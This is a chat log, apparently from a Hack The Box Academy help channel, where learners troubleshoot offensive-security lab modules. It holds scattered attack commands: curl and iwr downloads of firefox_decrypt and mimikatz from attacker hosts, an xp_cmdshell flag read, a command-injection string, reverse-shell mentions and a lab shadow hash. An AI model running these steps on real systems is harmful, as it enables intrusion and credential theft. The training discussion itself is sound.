Did you ever figure this out, I'm stuck with the same problem

yess but it was not simple

I can DM me

you're likely using the wrong hash for krbrelayx, use the nt hash of callum.dixon instead

I dislike how the SSTI part of the SS module goes from "hey look, 7*7 is fun" right into
"Register a function as a filter callback via registerUndefinedFilterCallback
Invoke _self.env.getFilter() to execute the function we have just registered".
It's an insane increase in difficulty.

hi, i have a problem in the Logrotate section of the Linux Privilege Escalation module, i do all the steps required however, i do not get the "done" message at the end of the command, is there anyone who could help me? Ive tried editing the access.log file manually for it to rotate, having it copy the flag or spawning a reverse shell.

ive compiled it on the victims machine and ive tried multiple payloads, all with no success

nvm

wrong command

||take off the -c and -s from the exploit command and it should work||

Just want to confirm that the template referred to in the Documentation & Reporting Practice Lab is the sample report that can be downloaded from the resources? Or was I supposed to find a template from the testing VM (I only saw the obsidian notebook)?

Also, making reports seems intimidating and challenging 😅

there's a template report for cpts pinned in #cpts

Thank you very much!

What does the tilde(`) do?

oldschool obfuscation

akin to \ escaping

also this looks like a walkthrough of a machine; did you mean to post in #starting-point ?

ok i'll post there from now on then

but chatgpt says it's command substitution

i have no idea what command substituion is either

similar

actually i'm slightly wrong

`command` is akin to $(command)

So it is something called inline execution?

basically

have you ever done a command like for x in $(cat file) type deal? it's that

I didn't do too much bash scripting actually :/

using backticks is considered deprecated

i mean it's not really bash scripting

i just used an example

i see

but for the most part it's injecting a command in the middle of another one

yeah, i get the idea. thanks

substituting a portion of it for the output of that command

usually used with some for loops for simple automation scripts to run through a list

but can be useful for other instances

i did similar stuff in python

ah so you know it's like calling a function to get a variable

yeah yeah. i get it bro

hello"); $(ls)

im a pro hacker btw

congrats (we don't care)

What is the SSH key of NASA?

they've been yeeted already

btw, can you guys give me some command injection machine links?

I am ravaging google but all they give is some writeups and walkthroughs

you can do the machines in the walkthrough

no machine is only command injection, cozyhosting has it in the attack chain, the others I could think of is probably too advanced

why are there hardly any ctf on command inj?

Offsec Proving grounds Shakabrah has it

command injection is only a small part of it

so it is not very important i guess?

because if I googel "sqli" or "xss" there are millions of ctfs on them

it's important to know; but it's not a central part of it

there's a million different types of sqli and xss vulns

because there isn't much variation for just command injections, you either figure it out or you don't

command inject is just "oh i can run command in this"

i guess ill skip command inj practice. it should be better to move on to other topics. what do ya say?

¯_(ツ)_/¯

it looks like your fav text art

there's a module that includes it i believe but you're also chatting in the academy modules channel about it

the probelm is i don't have cubes 😦

acquire money

¯_(ツ)_/¯

if you participate in the seasons you can earn some academy vouchers and stuff

student is only $8 a month

those are only good for annual subs in academy

there is a dollar crisis in my country. So even 8 bucks is a lot of money

Can I chat to anybody about the AD Enumeration Skills Check - Part 2? I'm stuck on getting the Administrator flag on MS01

check with all the users you have

I think I must have missed a user. I see from bloodhound which one I need, just don't have a hash or password for them

probably, dump the usual things

Thanks. Got it.

Y’all ever get so involved with a lab that you lose track of time, 3 hours past my bedtime but I finished HTBA Password Attacks medium lol, harder than I anticipated

begininng of main platform

😇

gz but be mindful there are places for these ( #starting-point )

Yes sir

I am stuck at Linux Fundamental Questions regarding How many Partition Exists in PwnBox I tried fdisk -l mount and stuff but I can't seem to get it

fdisk -l will give you the answer

Na It didn't I tried

count it

How to count I mean I tried from 1-10 but it didn't work either

If I move on from a module to the next section, does the target box die? I'm doing a password spray that is taking eternity and would like to move on.

make sure there's no spaces in your answer

only if you spawn another target

too ez. Thanks, pity all the next modules have targets. Thanks for this.

I the answer must be number right? So I guess there are no spaces

the format is gven in the question, a single number

I randomly got the answer but don't know the why I can count to 2 but what is the other one

you are running the command in pwnbox?

Yes

I can clearly see the list of partitions which gives the answer 🤷‍♂️

• 0 Examine the target and find out the password of the user Will. Then, submit the password as the answer. can someone help i mutated kiras psasword for ssh but it no eotk

hi guys how i earn cubes

start with ftp

https://tenor.com/view/happy-gif-25514964

||money||

i have only 20 cubes at this time so how i unlock tier2 modules

bro i am have no money

why

how do u not have money

why

that is sad but there is no way to get more cubes than what you started with

any other option to get cubes

compete in ctfs that have prizes related to hackthebox

^

which platform i play ctf

no idea, you will have to look around

ftp didnt work either

use the mutated list

please anyone guide my what i do.

lowercase is important

Kira is different from kira

use lowercase

for the name

o i c

dankeschone

do ftp and ssh share same password?

why doese ftp bruteforce work for ssh too?

if i find ftp password for a user and used ti for ssh it works why?

Maybe @fathom pendant will do the module for you so you don't have to try?

i did it

im inside

password reuse.

oh i c danke

I can see 2 but where is third one?

wdym where's the third it's clearly listed? vda{X}

I have vda and vdb but can't find vdaX

(X is a sub)

there's also no vdb in pwnbox, again, are you running the command in pwnbox

Can also be both FTP and SSH are using system users for auth ?

yep

this tbh

are you confusing the Parrot HTB-Edition vm for pwnbox?

(common thing to happen)

No I am Using PwnBox from Website

Hey I don't know if it's the right place for such feedback, but there's a lot of places in the AD Course where it states "In this section, we will move back and forth between a Windows and Linux attack host as we work through the various examples. You can spawn the hosts for this section at the end of this section and RDP into the MS01 Windows attack host. For the portions of this section that require interaction from a Linux host, you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!." In fact that linux box also have an IP that is reachable via VPN, so everytime I have to RDP to the windows box, then SSH to the parrot vm, check its IP, and then I can SSH directly to parrot box. Would be so much easy to just print both IPs in the page when you spawn the vm

#858470491676737536 fits better (also best to specify AD Enum and Attacks as there's a couple "AD" courses

guys any tips for the linux password attacks? i tried to transfer firefox decrypt and lazagne but none of them work i checked the hist too

what exactly doesn't work ?

lazagne.exe

or firefox decrypt i transfer it through curl but they dont execute

you tried to run an exe on linux?

yeap

I mean if you want help, give specifiic error messages / codes etc

does not work won't help 🙂

curl -o ./firefoxs.py http://10.10.15.16/firefox_decrypt.py
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 335 100 335 0 0 1735 0 --:--:-- --:--:-- --:--:-- 1744
kira@nix01:~$ chmod +x firefoxs.py
kira@nix01:~$ python3 firefoxs.py
File "firefoxs.py", line 1
<!DOCTYPE HTML>
^
SyntaxError: invalid syntax

as you see " <!DOCTYPE HTML>"you got an html file

an exe is a windows executable

not python file... Looks like your url is wrong somehow, or at least throwing an errror

i c

ok danke

Maybe you downloaded the html file instead of row python on the remote server ? get https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py

Also personally, if you just need to copy a single python file, copy/pasting over ssh might be the easiest way 😄

ah i c danke

also any tips for Credential Hunting in Linux im inside the ssh as kira

wget is often better for pulling files

but i cant find nothing...

firefox decrypt is the way

but it doesnt work

as you saw curl got you an html file for w/e reason

nvm

i did that raw .py kira@nix01:~$ chmod +x firef.py
kira@nix01:~$ python3 firef.py
Traceback (most recent call last):
File "firef.py", line 46, in <module>
PWStore = list[dict[str, str]]
TypeError: 'type' object is not subscriptable

i transfer it the target box right

bruh i had to do python3.9

smh

You likely need to give the file as argument to the pyhon with --profile args

wat dat mean? i used python3.9 and it worked and i got flag

but also I was about to mention check your python version, this line PWStore = list[dict[str, str]]is declarative type of varaible, its available only on recent python versions

o i c

from this doc though seems supported since 3.5 https://docs.python.org/3/library/typing.html so that python version must have been very old 😄

i believe the default python env in the labs is like 2.x

but has 3.9 installed

He did python3 firef.py so should have used python3

the labs are also just clunky

the labs are needlessly clunky for sure

especially some of the "foothold" hosts

#modules Need help on HTB Academy Crest Pathway. Currently stuck on:
Analyzing Evil With Sysmon & Event Logs - Question 1
"Replicate the DLL hijacking attack described in this section and provide the SHA256 hash of the malicious WININET.dll as your answer. "C:\Tools\Sysmon" and "C:\Tools\Reflective DLLInjection" on the spawned target contain everything you need."

I have completed the following:

• Sysmon Install
• Changed the config file using Notepad to "Exclude"
• Updated the config file
• Changed the required dll file to what the question asks
• Moved both calc.exe and the changed dll file to desktop

.... The message box still does not appear?

Any help would be greatly appreciated!

I take it you're remoted into the specified target

Google

With my computer 🤷

with my samsung smart fridge

mom said it's my turn with your computer

Installing gentoo is must for a beginner hacker

Yes sir

@rustic sage but you are in the wrong channel for such questions. Such questions are better off in #general.
If you don't have access, read and follow #welcome

Is there any section in the CBBH that discusses how to bypass the removal of < > from the server-side?

Which module, which section?

Im asking if something like this or similar is mentioned in the CBBH modules?

i mean it feels like a very broad (and kinda odd question) what do you mean removal of <>

like are you referring to a specific type of attack?

are you referring to removing them from like the webpage?

the server side removes any thing between the brackets directly

so you mean bypassing code sanitization?

i.e. injection or something like that

yup

using like http encoding

¯_(ツ)_/¯

RDP admin account

whats the recommended path, do i stick with academy or visit the 2 other sites first

http encoding?

I think marcie meant URL encoding

I went str8 for the academy and pentester path, I am pretty happy.

what are the 2 other sites

main and ctf

there's nothing stopping you from doing all 3 at once, academy is more beginner friendly

Hello hackers. I have 2 questions regarding nmap.

1. "It is also useful when the target host has a personal firewall that drops incoming packets but allows outgoing packets. In this case, a Connect scan can bypass the firewall and accurately determine the state of the target ports. " -- What does it talk about? Since the firewall drops an incoming packet, how come there is an corresponding outgoing packet?? And compared with a SYN scan, if the state of the target ports can be determined by a Connect scan, it should be able to be determined by a SYN scan isn't it?

2. "However, it is important to note that the Connect scan is slower than other types of scans because it requires the scanner to wait for a response from the target after each packet it sends, which could take some time if the target is busy or unresponsive. " -- I don't understand why -sT, a connect scan takes longer than SYN scan. "It requires the scanner to wait for a response from the target" so does SYN scan!

Any thought / answer is appreciated!

Hi, I have a problem to connect by RDP to a windows machine in labs. It’s crash every minutes. Do you have any idea how I can fix this problem ? Thanks

reach out to support

https://nmap.org/book/man-port-scanning-techniques.html

This technique is often referred to as half-open scanning, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection and then wait for a response.
the tcp handshake is never completed for syn scans, so it's faster. as for the other question, I guess if some packets do get through, the full tcp connection can be more accurate

also try tcp for vpn

Hey! Can anyone give me some insight on the "Password Attacks Lab - Hard" Skills Assessment? There is a BitLocker encrypted .vhd, which I have gotten open on Linux using qemu-util and cryptsetup. The modules try to give you the necessary tools for the job, but I could not figure out a way to get this thing mounted without external tools not mentioned on the module.

Just making sure I'm not missing some super simple, easy way. Mounting required Admin rights on the Windows target machine, so could not do that, as suggested on the module.

I have solved the assessment itself, but I'm curious to learn.

mount it in a windows vm

Yeah, that is the obvious one. I have a Linux VM setup, but figured it should be possible without a Windows VM considering Pwnbox users 😄

Guess I'll have to set one up for future modules for convenience. Thanks!

hm I'm not sure about that, seems like some work to make it work. but having a windows vm will often come in handy

That is indeed a great tip. I was a bit stubborn, that's really it :p

The modules are great though. Really enjoying the CPTS path thus far

anyone ?

start by describing your exact issue maybe 🙂

I'm on the XSS Phishing, Im sure the URL payload is correct but after sending it, I received "Issue in sending URL!" error

Do you have any idea ?

@full nimbus

I haven't donee this module, but generally speaking adding the commandyou used, the tool, etc will help you to get answers 😉

1. I generate a paylaod based on the module
2. Create a temp HTTP server to host my payload and to monitor the request
3. Send the URL payload to the victim

receives and error "Issue in sending URL!"

P.S I tested the http server without yet sending the payload to the victim and it works, I can see the request contains test creds, this is to make sure that there's no error on the attacker server

but if i send it to url /phishing/send , then i received the error.

Anyone experienced the same error ? how did you able to resolve it ? TIA

I also tried using URL shortener like bitly but still the same error

community is not active 😐

Have you encoded the payload correctly?

the first part of your url should start with http://<IP>/phishing/index.php

Tried both URL encoded and non encoded

Yes this is the first part of my payload, still have the error

it should be the target ip, not your own

wait how did i hide it, pipe not working.

@next bronze is my whole payload correct ?

I tried sending it both URL encoded and not but still have the same error

reset

Aww, ok let me reset the VM

ah wait you missed something, compare your payload with the example

what do you mean, can't find it

Looks like syntax for the action attribute in the form element is incorrect. It should be enclosed in quotes. For example action="http://<attacker-server>/". the browser may not parse the URL correctly

Let me check that one and see if will work

still the same error even I enclosed with quotes

try your own payload, enter something to make sure it works, then use the url from the browser address bar which will be nicely encoded for you

figure it out now

@plain coral is correct, it should be enclosed with quotes

the reason i received error in my first try is the quote was not url encoded

Thank you @next bronze and @plain coral for the help, I appreciate the respones! 🙂

I'll be removing the payload that I paste to avoid spoiler.

Thank you! 🙂

it works without the quotes

I did repeat it, haha it's actually weird.. now it works both with and without :))

Anyways, thank you so much!

Anyone able to give me a nudge on "Command Injections" skills assessment? I can't seem to find the injection point.

Hey ! I have a little problem on the footprinting easy lab, may someone could help me please ? 🙂

Hi! im on AD Enumeration & Attacks - Skills Assessment Part II and got a bit lost on the queston 7. Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I was able to log in with the user that i found before using mssqlclient and look aroiund. I gathered some info, got the hash for SQL01$ user and got a reverse shell with nt service\mssql$sqlexpress but dont know where to go from here. I wasnt able to log in with SQL01 using PtH. What am i missing?

hello, i just finished the skill assessment of "Security Monitoring & SIEM Fundamentals" but i am still perplexed about the "why" in some of the questions ,wouldn't you know of a video or a frum thread with some explanations

I succeed to get the key, I change its rights but I can't connect to the ssh server

have you tried to use xp_cmdshell to read the file maybe ?

tired it, its sais no priv for that

when i run xp_cmdshell i am at this account
PS C:> whoami
nt service\mssql$sqlexpress

i have a reverseshell with xp_cmdshell

xp_cmdshell "type c:\users\administrator\desktop\flag.txtI meant sth like that

You might need to enable this first, with impacket msqlclient you can do enable_xp_cmdshell

if you are using native sql client mightj be another way

can also be this is legit blocked 🙂

you didn't closed the " in the command. Not usre it would make a diff. Othewise I dunno 🙂

no diff but thx

I've got a few sections left before doing the assessments for that same track 🙂

justi ncase did you tried c:\users\administrator.inlanefreight\desktop\flag.txt ?

@wanton timber have you open the port in the firewall of your host ? Sometime it's stupid as that 🙂

i already tried but here is an output for you

the thing is that with this user that i logged in i am anready a sysuser in the mssqldb but when i am trying to run xp_cmd i am just a service account, i need to escalate some priv but idk how

From https://academy.hackthebox.com/module/143/section/1275, check the section about SeImpersonatePrivilege,

I've seen some chat about the "KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP" error on the Windows Attack & Defense > PKI-ESC1 module when running the command after copying back the cert.pfx to WS001, but is there an actual fix? Im using pwnbox through eu-academy-1 and then RDP to kali and then RDP to WS001. This whole module has been shockingly bad when it comes to using RDP. I get constant disconnects, errors when connecting to WS001 via RDP which arent fixed for days and then they break again within a day. I dont think i've properly been able to learn much in this module due to the constant interruptions

okay turned out that the hash that i got from responder is a net-ntlmnot a user NTLM hash soo now i know what i did wrong, but still not luck.. any ideas?

You can just use mssql client

Enable cmdshell

And use printspoofer

For q7 that is

I found the /etc/krb5.keytab file, tried to utilize it with kinit to impersonate the Linux machine, what am i doing wrong?

copy from windows, paste directly on kali.

Reset machine (yellow button)

change server to EU

No

Contact fb support

I'm already using EU. I directly copied the output of the cert into a file on Kali and called it cert.pem. I ran the 2 commands on Kali (sed and to convert to pfx). I then copied the cert.pfx back to windows using smbclient

that sounds right.

If resetting the instance doesn't work, I have no further recommendations

Thanks. Ive contacted support so I'll see if they have any ideas. Do you reset pwnbox or target or both? I don't understand why resetting either would help unless the transfer of cert.pfx back to windows is corrupting it

because I had a similar issue, and it got resolved when i resetted the target machine

I'll try that tomorrow. Thanks

Hi everyone so I was just doing the Linux fundamental and they ask what is the path to the email of the user. I do not understand why the end of the path differs from what the command whoami gives you? Why is it just the username as the one that you have been connected through SSH and not the current username

Can anyone suggest me a networking course or something like that to build my networking foundation especially related to cybersecurity

I have a basic idea about it

Hi. Someone could help me with the hacking wordpress module? TBH I´m beginner and idk even if I´ve
to ask here

@stone pasture if you are looking for networking security, Cisco CCNP Security is good

or CCNA Security to start with

Just post your questions here. Tell us what you have tried and what did not work. Then we can nudge you in the right direction

I have some basic idea about networking But want to know and explore deep from cybersecurity pov

Networking Security is quite different from other Cybersecurity fields, but I think Cisco's CCNA / CCNP security certs are good, at least was relevant when I did it 10y ago

Lmao ,😂 I just want to get started to know networking from cybersecurity pov not to specialize in network security not yet atleast

ah I thought you wanted to learn Networking Sec 🙂

so pure networking you can check Cisco's CCNA

there's a few topics that are vendor specific, like CLI & stuff, but all concepts & techs should be explained as well

you also have a module about that on HTB https://academy.hackthebox.com/module/details/34

Thanks, Well... I have to find the name from a "USERS ID2" wich must be in "url"/wp-json/wp/v2/users. Using "curl" and "JQ" y can see the ID`1s name but ID2. I used wpscan --url <url> -e u and I can see the ID1´s name and ID2 and ID3 too but it doesn't work

submit the full name of the user with id 2

not that difficult

You really don't need a deep dive, intro to networking module is tier 0

doesn´t work 😦

im gonna try to do that

but how am i gonna transfer that

god

Just use powershell?

You have xp_cmdshell

Hey, I'm trying to do the AD AD Enum & Attacks skill 1, stuck pretty much at the beginning, i'm trying to copy tools to the host using PS C:\windows\system32\inetsrv> iwr http://10.10.16.75:8000/mimikatz.exe -OutFile c:\tmp\mimikatz.exe\ however the connection is reset. I'm suspecting it's due to windows defender, but all commands i tried to check status and / or disable are giving no output (like sc query windefend, Get-MpComputerStatus) ... I'd take a small insight on this one

Connect via RDP with the Administrator account and submit the flag.txt as you answer.

Attacking Common Services.

I tried to add DisableRestrictedAdmin in order to use pth, didn't work.
Tried to decrypt the admin hash, nothing worked.
Tried to see if password reusage is a thing here, nope it isn't.

Any tips? Does it have to do smth with that crowbar.

I personally used a windows/shell_reverse_tcp payload from msfvenom

To upgrade my shell

But 1 and 2 can be done without that

I have a reverse shell, but just a classic nc one 🙂

So what exactly are you stuck on

1 literally tells you what to do

And 2 is just a matter of following the section

I'm trying to kerberoast, I've tried usinng New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433" however getting error + FullyQualifiedErrorId : TypeNotFound,Microsoft.PowerShell.Commands.NewObjectCommand. Then I tried to copy rubeus or mimikatz to the machine, but during transfer,, the connection gets reset, which I believe is becuase of windows defender

but I was not able to verify this thru PS either.

And to use impacket, I guess I would need to have connectivity to the DC which I don't

there's probably something stupid I'm overlookign

Setspn

Look into that

tips for Passwd, Shadow & Opasswd in passowrd atack

In the module, setspn is just used to list account with SPNs https://academy.hackthebox.com/module/143/section/1423, New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken is then used to generate the tickets. I'll google setspn to generate ticket then

setspn -Q MSSQLSvc/SQL01.inlanefreight.local:1433

Sorry, in fact I was looking at question 3 🙂

Gave me the answer to the 2nd question

or how do i transfer lasagne and make it work on a linux target?

Question 3 upload mimikatz with the web shell, that’s the easiest

And then I upgraded the web shell with the msfvenom payload I mentioned

After that it was just a matter of following the section again

Hey ! I've a question for the FootPrinting Lab - Medium, I have the password of 'sa' and i tried to connect (rdp protocol) with this command : xfreerdp /u:[The User] /p:[The password] /v:[IP] and I obtained : failed connected. Is it normal ?

Alright, thanks a lot 🙂 Seems uploading from the webshell works, not sure why copying mimikatz via python webserver failed

it is the password you find in a file 'imp-----.txt'

'sa:-------------' (this is the format of the file)

Oh you are french x)

#rules

English only sir.

Were you able to upgade to meterpreter shell ?

I gave you the payload I used, I did not use meterpreter

It seems much better than native powershell reverseshell... Thanks ;:;)

Need a pointer on this "Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X"- dont seem to understand what they want. All dates I have entered have been wrong. Many thanks

why doesnt hashcat work root:$6$XePuRx/4eO0WuuPS$a0t5vIuIrBDFx1LyxAozOu.cVaww01u.6dSvct8AYVVI6ClJmY8ZZuPDP7IoXRJhYz4U8.DJUlilUw2EfqhXg.:19032:0:99999:7:::

and then i also tried $6$XePuRx/4eO0WuuPS$a0t5vIuIrBDFx1LyxAozOu.cVaww01u.6dSvct8AYVVI6ClJmY8ZZuPDP7IoXRJhYz4U8.DJUlilUw2EfqhXg.

Youre welcome

I think there is a bug on the third question of the Fundamentals of Active Directory Module in the Active Directory Structure section